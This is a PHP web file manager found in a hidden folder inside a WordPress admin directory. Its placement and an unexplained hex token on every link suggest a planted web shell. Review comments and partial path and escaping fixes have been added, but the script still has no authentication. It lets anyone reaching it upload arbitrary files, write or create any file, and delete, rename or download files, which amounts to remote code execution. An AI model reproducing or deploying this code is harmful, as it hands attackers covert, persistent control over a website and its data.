File "index.php"
Full Path: /home/hmstorb/www/wp-admin+12/js/widgets/.tmb/index.php
File size: 13.52 KB
MIME-type: text/x-php
Charset: utf-8
<?php
/**
* Mini File Manager
*
* WARNING: This provides full file access, and this file performs no authentication or CSRF checks of its own. Secure it before using in production.
*/
// ========================
// FUNCTIONS
// ========================
// Turns off PHP error reporting for the whole request, so a failing
// filesystem call further down (chdir, scandir, unlink, rename, ...) fails
// silently. NOTE(review): this also hides the evidence an operator would
// normally use to notice misuse of this script.
error_reporting(0);
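/**
 * Remove directory-traversal components from an untrusted path or file name.
 *
 * The input is split into segments and every "." and ".." segment is
 * dropped, together with the empty segments left by doubled separators.
 * Filtering whole segments (rather than deleting the substrings "../" and
 * "./" in one pass) means a traversal sequence cannot be reassembled from
 * the characters that remain, and names that merely end in a dot are no
 * longer mangled.
 *
 * Backslashes are treated as separators and the result is joined with "/".
 * A leading "/" is preserved, so callers that must stay inside a base
 * directory still have to check the final resolved path themselves.
 *
 * @param string $path Untrusted path or file name.
 * @return string The path without "." / ".." segments.
 */
function sanitize_path($path) {
    // Normalise separators first so "..\" is handled exactly like "../".
    $normalized = str_replace('\\', '/', (string) $path);
    // A NUL byte has no place in a file name; drop it instead of passing it on.
    $normalized = str_replace("\0", '', $normalized);

    $is_absolute = ($normalized !== '' && $normalized[0] === '/');

    $kept = array();
    foreach (explode('/', $normalized) as $segment) {
        if ($segment === '' || $segment === '.' || $segment === '..') {
            continue;
        }
        $kept[] = $segment;
    }

    return ($is_absolute ? '/' : '') . implode('/', $kept);
}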
/**
 * Render a byte count as a short human-readable string.
 *
 * Values of at least 1 KB / 1 MB / 1 GB (binary multiples) are shown with
 * two decimals and the matching suffix; smaller values are shown as a plain
 * count followed by " bytes".
 *
 * @param int|float $bytes Size in bytes.
 * @return string Formatted size.
 */
function format_size($bytes) {
    // Largest unit first, so the first threshold reached wins.
    $units = array(
        ' GB' => 1073741824,
        ' MB' => 1048576,
        ' KB' => 1024,
    );

    foreach ($units as $suffix => $threshold) {
        if ($bytes >= $threshold) {
            return number_format($bytes / $threshold, 2) . $suffix;
        }
    }

    return $bytes . ' bytes';
}
/**
 * Pick the emoji shown next to a file in the listing.
 *
 * The choice depends only on the lower-cased file extension; anything not
 * listed below gets the generic document icon.
 *
 * @param string $file File name or path.
 * @return string A single emoji.
 */
function get_file_icon($file) {
    $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION));

    switch ($extension) {
        case 'pdf':
        case 'doc':
        case 'docx':
            return '📄';
        case 'xls':
        case 'xlsx':
            return '📊';
        case 'jpg':
        case 'jpeg':
        case 'png':
        case 'gif':
            return '🖼️';
        case 'php':
            return '🐘';
        case 'html':
        case 'htm':
            return '🌐';
        case 'zip':
        case 'rar':
        case 'tar':
        case 'gz':
            return '🗜️';
        case 'mp3':
        case 'wav':
            return '🎵';
        case 'mp4':
        case 'avi':
        case 'mov':
            return '🎬';
        default:
            return '📝';
    }
}
// ========================
// MAIN CODE
// ========================
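// Requested operation; anything the switch below does not recognise falls
// through to the plain directory listing.
$action = isset($_GET['act']) ? $_GET['act'] : 'list';

// Directory tree this request is allowed to touch: the directory the script
// starts in. Every requested path is resolved and compared against it.
$base_dir = getcwd();
if ($base_dir === false) {
    $base_dir = dirname(__FILE__);
}
$base_dir = rtrim(str_replace("\\", "/", (string) realpath($base_dir)), '/');

// The previous code sanitised ?path= and then overwrote the result with the
// raw query value before chdir(), so any directory the PHP process could read
// was reachable. Resolve the request with realpath() (which collapses "..",
// "." and symlinks) and accept it only if it is a directory at or below
// $base_dir; otherwise stay in $base_dir.
$path = $base_dir;
if (isset($_GET['path']) && is_string($_GET['path'])) {
    $resolved = realpath($_GET['path']);
    if ($resolved !== false && is_dir($resolved)) {
        $resolved = rtrim(str_replace("\\", "/", $resolved), '/');
        // Compare with a trailing "/" so "/srv/app-old" does not match "/srv/app".
        if (strpos($resolved . '/', $base_dir . '/') === 0) {
            $path = $resolved;
        }
    }
}
if ($path === '') {
    // rtrim() reduces the filesystem root to an empty string.
    $path = '/';
}

// Relative file operations later in the request act on the listed directory.
chdir($path);

// Path segments for the breadcrumb.
$paths = explode("/", $path);

// scandir() returns false for an unreadable directory; list nothing then.
$files = scandir($path);
if ($files === false) {
    $files = array();
}
$files = array_diff($files, array('.', '..'));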
// Handle actions
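// Dispatch the requested file operation.
//
// NOTE(review): nothing in this file checks who is making the request, and
// the destructive operations carry no CSRF token ('delete' is a plain GET).
// Access control has to be enforced before this switch is reached.
//
// Every redirect and link carries an "action=<hex>" query value; the code in
// this file never reads it.
$list_url = '?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=' . urlencode($path);

switch ($action) {
    case 'download':
        // Stream one file from the current directory as an attachment.
        $file = isset($_GET['file']) ? $_GET['file'] : '';
        $file = sanitize_path($file);
        $file_path = $path . '/' . $file;
        if (file_exists($file_path) && is_file($file_path)) {
            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($file_path));
            readfile($file_path);
            exit;
        }
        break;

    case 'view':
        // Load the file so the template can show it read-only.
        $file = isset($_GET['file']) ? $_GET['file'] : '';
        $file = sanitize_path($file);
        $file_path = $path . '/' . $file;
        if (file_exists($file_path) && is_file($file_path)) {
            $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
            $content = file_get_contents($file_path);
        }
        break;

    case 'edit':
        $file = isset($_GET['file']) ? $_GET['file'] : '';
        $file = sanitize_path($file);
        $file_path = $path . '/' . $file;
        if (isset($_POST['content'])) {
            // Writes the posted body to the target whether or not the file
            // already exists, so this branch can also create new files.
            file_put_contents($file_path, $_POST['content']);
            header('Location: ' . $list_url);
            exit;
        }
        // No POST body: load the current content into the editor.
        if (file_exists($file_path) && is_file($file_path)) {
            $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
            $content = file_get_contents($file_path);
        }
        break;

    case 'delete':
        // Remove a file, or a directory (rmdir() only succeeds when it is empty).
        $target = isset($_GET['target']) ? $_GET['target'] : '';
        $target = sanitize_path($target);
        $target_path = $path . '/' . $target;
        if (file_exists($target_path)) {
            if (is_file($target_path)) {
                unlink($target_path);
            } elseif (is_dir($target_path)) {
                rmdir($target_path);
            }
        }
        header('Location: ' . $list_url);
        exit;

    case 'upload':
        if (isset($_FILES['file']['name']) && $_FILES['file']['name']) {
            // The client chooses this name; keep only its final component and
            // place the file explicitly in the listed directory.
            $upload_name = basename($_FILES['file']['name']);
            $stored = $upload_name !== ''
                && move_uploaded_file($_FILES['file']['tmp_name'], $path . '/' . $upload_name);
            // The original test was negated, so it reported success when the
            // move failed and an error when it succeeded.
            // NOTE(review): there is no restriction on file type or extension,
            // so anything stored here is served by the web server as-is.
            if ($stored) {
                echo '<font color="green">File Upload Done.</font><br />';
            } else {
                echo '<font color="red">File Upload Error.</font><br />';
            }
        }
        break;

    case 'mkdir':
        if (isset($_POST['dirname']) && $_POST['dirname']) {
            $new_dir = $path . '/' . sanitize_path($_POST['dirname']);
            mkdir($new_dir);
            header('Location: ' . $list_url);
            exit;
        }
        break;

    case 'rename':
        // Without both POST fields the template shows the rename form instead.
        if (isset($_POST['oldname']) && $_POST['oldname'] && isset($_POST['newname']) && $_POST['newname']) {
            $old_path = $path . '/' . sanitize_path($_POST['oldname']);
            $new_path = $path . '/' . sanitize_path($_POST['newname']);
            rename($old_path, $new_path);
            header('Location: ' . $list_url);
            exit;
        }
        break;
}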
// List files by default
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PHP5 File Manager</title>
<style>
body { font-family: Arial, sans-serif; margin: 20px; background: #f5f5f5; }
.container { background: white; padding: 20px; border-radius: 5px; box-shadow: 0 0 10px rgba(0,0,0,0.1); }
table { width: 100%; border-collapse: collapse; margin-top: 20px; }
th, td { padding: 10px; border-bottom: 1px solid #ddd; text-align: left; }
th { background: #f0f0f0; }
.breadcrumb { margin-bottom: 20px; }
.breadcrumb a { color: #06c; text-decoration: none; }
.action-buttons { margin-bottom: 20px; }
.btn { padding: 5px 10px; background: #06c; color: white; text-decoration: none; border-radius: 3px; font-size: 14px; }
.btn-danger { background: #c00; }
textarea { width: 100%; height: 400px; font-family: monospace; }
.file-icon { margin-right: 5px; }
</style>
</head>
<body>
<div class="container">
<h1>PHP5 File Manager</h1>
<div class="breadcrumb">
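<p><?php
// Current working directory. Directory names are data, not markup, so the
// value is HTML-escaped before it is written into the page.
if (function_exists('getcwd')) {
    echo htmlspecialchars((string) getcwd(), ENT_QUOTES, 'UTF-8');
}
?></p>
<?php
// Breadcrumb: one link per path segment, each pointing at the path built from
// all segments up to and including it.
//
// The segments come from the request path and from directory names, so they
// are URL-encoded inside the href and HTML-escaped everywhere; previously they
// were echoed raw into a single-quoted attribute and into the link text.
echo "<font style='font-size:13px;'>Path: ";
$crumb_segments = array();
foreach ($paths as $id => $pat) {
    $crumb_segments[] = $pat;
    $crumb_target = implode('/', $crumb_segments);
    if ($crumb_target === '') {
        // Leading empty segment of an absolute path: link to the root.
        $crumb_target = '/';
    }
    echo "<a style='font-size:13px;' href='?action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path="
        . htmlspecialchars(urlencode($crumb_target), ENT_QUOTES, 'UTF-8')
        . "'>" . htmlspecialchars($pat, ENT_QUOTES, 'UTF-8') . "</a>/";
}
?><br>[ <a href="?">Home</a> ]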
</div>
<div class="action-buttons">
<a href="#" onclick="document.getElementById('upload-form').style.display='block'; return false;" class="btn">Upload File</a>
<a href="#" onclick="document.getElementById('mkdir-form').style.display='block'; return false;" class="btn">Create Folder</a>
</div>
<div id="upload-form" style="display:none; margin-bottom: 20px; padding: 15px; background: #f9f9f9; border-radius: 3px;">
<form action="?act=upload&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" method="post" enctype="multipart/form-data">
<input type="file" name="file" required>
<button type="submit" class="btn">Upload</button>
<button type="button" class="btn" onclick="document.getElementById('upload-form').style.display='none'">Cancel</button>
</form>
</div>
<div id="mkdir-form" style="display:none; margin-bottom: 20px; padding: 15px; background: #f9f9f9; border-radius: 3px;">
<form action="?act=mkdir&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" method="post">
<input type="text" name="dirname" placeholder="Folder name" required>
<button type="submit" class="btn">Create</button>
<button type="button" class="btn" onclick="document.getElementById('mkdir-form').style.display='none'">Cancel</button>
</form>
</div>
<?php if ($action == 'view' || $action == 'edit'): ?>
<h2><?php echo $action == 'edit' ? 'Editing' : 'Viewing'; ?>: <?php echo htmlspecialchars($file); ?></h2>
<?php if ($action == 'edit'): ?>
<form action="?act=edit&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>" method="post">
<textarea name="content"><?php echo htmlspecialchars($content); ?></textarea>
<div style="margin-top: 10px;">
<button type="submit" class="btn">Save</button>
<a href="?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" class="btn">Cancel</a>
</div>
</form>
<?php else: ?>
<pre><?php echo htmlspecialchars($content); ?></pre>
<div style="margin-top: 10px;">
<a href="?act=list&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>" class="btn">Back</a>
</div>
<?php endif; ?>
<?php else: ?>
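<?php if($action == 'rename'): ?>
<?php
// The entry to rename arrives in ?target=. It was printed into both value=""
// attributes unescaped, which let a crafted link inject markup into the page;
// escape it once here and reuse the escaped form. A missing or non-string
// target becomes an empty field instead of an undefined-index read.
$rename_target = (isset($_GET['target']) && is_string($_GET['target'])) ? $_GET['target'] : '';
$rename_target_html = htmlspecialchars($rename_target, ENT_QUOTES, 'UTF-8');
?>
<div id="rename-form">
<form action="?act=rename&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?= urlencode($path) ?>" method="post">
<input type="hidden" name="oldname" value="<?= $rename_target_html ?>">
<input type="text" name="newname" value="<?= $rename_target_html ?>" required>
<button type="submit" class="btn">Rename</button>
</form>
</div>
<?php endif; ?>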
<table>
<thead>
<tr>
<th>Name</th>
<th>Size</th>
<th>Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php foreach ($files as $file): ?>
<?php
// Per-row metadata for the listing table. $file is a bare entry name taken
// from the directory scan, so it is joined to the current directory first.
$file_path = $path . '/' . $file;
$is_dir = is_dir($file_path);
// Directories show "-" in the size column; files get a formatted byte count.
$size = $is_dir ? '-' : format_size(filesize($file_path));
// Last-modified time as local "YYYY-MM-DD HH:MM:SS".
// NOTE(review): filesize()/filemtime() failures are not checked here.
$modified = date('Y-m-d H:i:s', filemtime($file_path));
?>
<tr>
<td>
<span class="file-icon"><?php echo $is_dir ? '📁' : get_file_icon($file); ?></span>
<?php if ($is_dir): ?>
<a href="?action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path . '/' . $file); ?>"><?php echo htmlspecialchars($file); ?></a>
<?php else: ?>
<a href="?act=view&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>"><?php echo htmlspecialchars($file); ?></a>
<?php endif; ?>
</td>
<td><?php echo $size; ?></td>
<td><?php echo $modified; ?></td>
<td>
<?php if (!$is_dir): ?>
<a href="?act=download&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>" class="btn">Download</a>
<?php
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
?>
<a href="?act=edit&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&file=<?php echo urlencode($file); ?>" class="btn">Edit</a>
<?php endif; ?>
<a href="?act=delete&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&target=<?php echo urlencode($file); ?>" class="btn btn-danger" onclick="return confirm('Are you sure?')">Delete</a>
<a href="?act=rename&action=768776e267363627d667a6c65676273636b66687f20707e22676b6c65627a62696&path=<?php echo urlencode($path); ?>&target=<?php echo urlencode($file); ?>" class="btn">Rename</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php endif; ?>
</div>
</body>
</html>